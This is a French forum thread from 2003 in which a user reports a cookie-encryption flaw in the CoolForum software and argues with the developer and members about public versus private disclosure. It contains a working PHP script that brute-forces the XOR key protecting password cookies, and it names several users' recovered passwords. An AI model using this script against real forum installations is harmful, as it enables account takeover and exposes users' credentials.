J'ai rentré:

Bilan de l'opération, j'ai récupéré quelques mots de passe sans trop de difficultés ("guigui", "poetes", "vai3oncool"...)
Tout ça pour dire qu'il serait bien venu d'informer les utilisateurs de ce forum qu'ils s'exposent à de sérieux problemes de sécurité.
Ou alors le but est justement de publier ce qu'on appelle une "backdoor"...

Comment tu as fais pour obtenir la chaine de cryptage de Cool Forum étant donné que les mots de passe stockés dans les cookies sont cryptés avec la chaine de cryptage ?

*** Message édité par TiGeR le 23/06/2003 22:55 ***

A croire qu'on ne lit pas les messages...

Je salue le fait que tu nous informes du trou de sécurité que tu as trouvé. Le problème est que ce n'est pas trés malin de le publier ici. En effet il aurait été logique de m'en informer tout d'abord par mail afin que je puisse prendre le temps de préparer un patch dans la semaine étant donné que je suis surbooké et que j'aurai pas le temps de m'en occuper avant demain ou aprés demain et que comme il va ENCORE falloir qu'on sorte ça dans l'urgence, ben on aura pas le temps de faire des tests poussés.

En gros: encore un ou deux jours à attendre avant de pouvoir sécuriser la chose et aucun test poussé afin de voir s'il n'y a pas d'autres trous.

En gros c'est bien de nous informer du problème, tu as eu une bonne réaction, mais la prochaine fois pense à ne pas l'étaler comme ça. Un patch sortira mais dans la semaine seulement, avant j'ai pas le temps...

Pour répondre à TiGeR, ça n'a pas été bien long...
J'ai regardé l'algorithme de cryptage (c'est la seule fois ou j'ai eu besoin de regarder dans le code du forum...) et je me suis aperçu qu'il serait possible de retrouver la clée (plus précisément une clée qui marche, car la fonction n'est pas bijective) par brute force 2 lettres par 2 lettres. Le script PHP que j'ai utilisé était hosté sur freesurf qui a fixé le temps max d'exécution à 30 sec...

Si ça vous interesse le voici:

<?

$pass1="%257Ca%255Dl%255E%2523PpWt%2540n%25094%2540F%25032%250E4%2514aNl%2513%252A%2501%253FR%257Bx%2560%255Bm%250BsU%257E%255Ds";
$pass2="%252As%255E1Yb%2503%257FV5K1%255C%2523%251FOU%2528%2508dApG%253BJ5W%253BQ8y5Y-WwV1%2501y";

function getdecrypt($tplxt,$cle)
{
	$ctr=0;
	$decode="";
	for ($i=0;$i<strlen($tplxt);$i++)
	{
		if ($ctr==strlen($cle)) 
			$ctr=0;
		$decode.=(substr($tplxt,$i,1)) ^ (substr($cle,$ctr,1));
		$ctr++;	
	}	
	$tmp = "";
	for ($i=0;$i<strlen($decode);$i+=2) 
	{
		$tmp.= (substr($decode,$i,1))^(substr($decode,$i+1,1));
	}
	return($tmp);
}

$tmp1=rawurldecode(rawurldecode($pass1));
$tmp2=rawurldecode(rawurldecode($pass2));

for ($i=48 ; $i<123 ; $i++) {
	for ($j=48 ;$j<123 ; $j++) {
		
		$clee = "".chr($i).chr($j);
		$passwd1=getdecrypt($tmp1,$clee);
		$passwd2=getdecrypt($tmp2,$clee);

		// 01234567890123456789
		// tototatatototatatoto

		if (substr($passwd1,10,1) == "0" and substr($passwd2,10,1) == "t") { print("$clee<br>"); }


	}
}
?>

Bon, vais quand même le dire parce que ça me les casse

Y a pas d'équipe ici, ça se résume à Coyote qui fait ça après son boulot.
Y a certes des utilisitateurs qui s'y connaissent et qui fournissent un coup de main comme Glode, Tiger, Lemistral et d'autres.

Ca me fait marrer les donneurs de leçon, avant de hacker faudrait apprendre à lire hein.
Si tu veux vraiment aider, envoie un mail à Coyote quand tu trouves quelque chose et arrête d'étaler le modus et les clefs pour faire chier le monde!

La critique et la destruction, c'est l'art des faibles!

Fais donc un forum comme celui-ci (tout seul comme un grand) et on ira voir si il n'y a pas un trou!

D'ailleurs, tu peux prendre n'importe lequel des forums, tu trouveras toujours des trous!

Reste à savoir si tu veux utiliser ton temps à créer et à être utile ou continuer à détruire et à te moquer?

Tu n'as pas bien crompris kingpopo.
Mettez juste un msg sur la page de téléchargement qui dit que le forum n'est pas sûr et je serai content.
Mon but n'a pas été de "faire chier" mais bien de corriger une faille. Et mon probleme c'est que qd j'ai mieux regardé j'ai trouvé bcp d'autres failles. Le ponpon c'est qd j'ai tapé "Powered by CoolForum" sur google. La j'ai trouvé des kinés des programmeurs et autres qui utilisent ce forum sans savoir que c'est une backdoor.
Quand on publie une application sur le net on a une responsabilité.
Quand ces gens qui vous font confiance vont retrouvé leurs mails piratés vous serez responsables.

Vi, admettons, si tu as trouvé tellement de choses, fais donc un résumé à Coyote et il corrigera, ça c'est constructif!

-C'est marqué en dessous que c'est une version beta

Pour le reste, ben tu demandes que la marque de bagnole indique: "vous pouvez acheter notre nouveau model mais faut qu'on vous dise qu'elle peut vous péter à la gueule à tout moment" ouais tu vas en trouver beaucoup sur ce coup

Php** est une passoire, je vois pas chez eux: "Gaffe ce forum craint", Vbull** c'est encore pire (pas de mention non plus), on peut tous les passer en revue hein, c'est pareil.

On fait confiance à coyote parce qu'on croit en ce forum et qu'il nous plaît.

Pour le piratage, ma plainte n'ira pas chez Coyote mais au FAI du connard qui me fait chier. Arrêter de transposer vos responsabilités de hackers sur les autres, un peu facile

C'est celui qui commet l'acte qui est responsable, si tu butes ton voisin avec l'arme "trucmuche", c'est pas "trucmuche" le responsable, c'est toi!

Ceux qui développent des trojans répondent ça aussi...
Je pense que Cool Coyote comprendra ce que j'ai voulu dire.

Certes, ceci dit c'est de la programmation comme une autre et du reste totalement légale

C'es pas toi, spécialement, qu'on vise hein

C'est celui qui l'emploie a des fins douteuses qui est responsable de ses actions!

Il n'est pas illégal de hacker un site conçu pour être hacké et installé sur un serveur privé. Comme il n'est pas illégale de te hacker toi-même

Bref, si mon voisin laisse sa porte ouverte, je ne vais pas m'installer dans son salon pour mâter la télé

Ce qu'on te reproche c'est de dénigrer bêtement CoolForum (voir tes autres posts), c'est de jeter le doute sur l'aide qu'on veut apporter (voir tes autres posts) et c'est ta façon de faire d'étaler tes trouvailles qui risquent de poser bien des problèmes à d'autres!

En d'autres termes, t'es le bienvenu si tu veux apporter une aide constructive mais tu ne l'es pas si c'est juste pour foutre le bordel.

C'était plus une provocation maladroite qu'une conviction Cool Coyote. Je ne pense pas que le but de votre travail soit de répandre une backdoor sur le net.

Si j'ai été si maladroit c'est que quand j'ai posté ma faille je croyais être sur un forum en phase de tests avec de nombreux reports de failles et au lieu de ça je me rends compte que les sujets qui commencent par [HACK] sont en fait des modifs et que le forum est déja publié comme si il était terminé.
C'est ça qui m'a étonné.
Si j'avais vu un message d'avertissement sur la page de téléchargement disant que "version beta" = "à ne pas utiliser mais à débuger" j'aurais continué mes investigations en étant heureux d'aider à développer ce forum qui du point de vue graphisme/fonctionnalités rivalise avec le phpbb et les autres.
J'aime participer à des développements open-source en plus c'est vrai que l'ambiance est "cool" ici (enfin avant que je débarque avec mes gros sabots ::p).
Voila c'est tout, j'ai pensé a tous ceux qui utilisent ce forum sans se rendre compte de ce qu'est une version beta.
Il y a assez de failles sur le net pour qu'on en rajoute pas (presque) volontairement :)
Je pense que vous connaissez déja mais au cas ou je vous donne l'adresse d'un site qui vous aidera dans votre quête périlleuse: http://www.phpsecure.info
Bonne continuation et pardon pour le (petit) dérangement occasioné

J'ai une question: L'algorithme de cryptage que vous utilisez, c'est vous qui l'avez écrit ? Sinon ou l'avez vous trouvé ?
Merci

*** Message édité par Securite le 24/06/2003 17:47 ***

Y'a pas de problèmes, je préfère quand les choses se passent comme ça et que tout est clair.

Des bugs il y en a encore plein, des trous j'en ai repéré plusieurs et forcément avec les versions on essaye d'améliorer cela en fonction du temps que l'on a.

Bien évidemment dès qu'on a un rapport sur une faille, on essaye de faire en sorte de publier le patch le plus rapidement possible. Là où je te disais que ça nous empêche de faire des tests plus poussés, ce n'est pas seulement à cause d'un seul champ à filtrer, c'est clair c'est pas compliqué, c'est parce que j'en profite pour améliorer d'autres choses que j'ai repéré. Enfin bref, le principal c'est que l'on se soit expliqué et je suis sûr que tout le monde va vite redevenir trés cool.

Pour le message d'information je pensais que la mention "beta" suffisait à dire que c'était en développement et donc pas stable, apparemment non donc je penserait à ajouter un Warning sur la page de téléchargement.

Voilà, en espérant te revoir trés bientôt parmi nous afin de nous (moi d'abord cette fois ) faire part de tes découvertes

pour le souci du pass, c'est pas trop de le retrouver le plus important, mais plutot d'identifier l'emetteur qui te signale qu'il a perdu son pass.
Et si l'identification est confirmé tu lui envoi par mail un nouveau pass, en demandant de se reloguer avec, et de changer de suite ce nouveau pass.


j'espère avoir était clair la dessus.....
j'ai un peu de mail cette aprem.


car si tu as un code qui te permette de retrouver un pass, un petit malin sera toujours la pour débusquer le code et s'en servir a des fins ....
ce que l'on apelle un crackers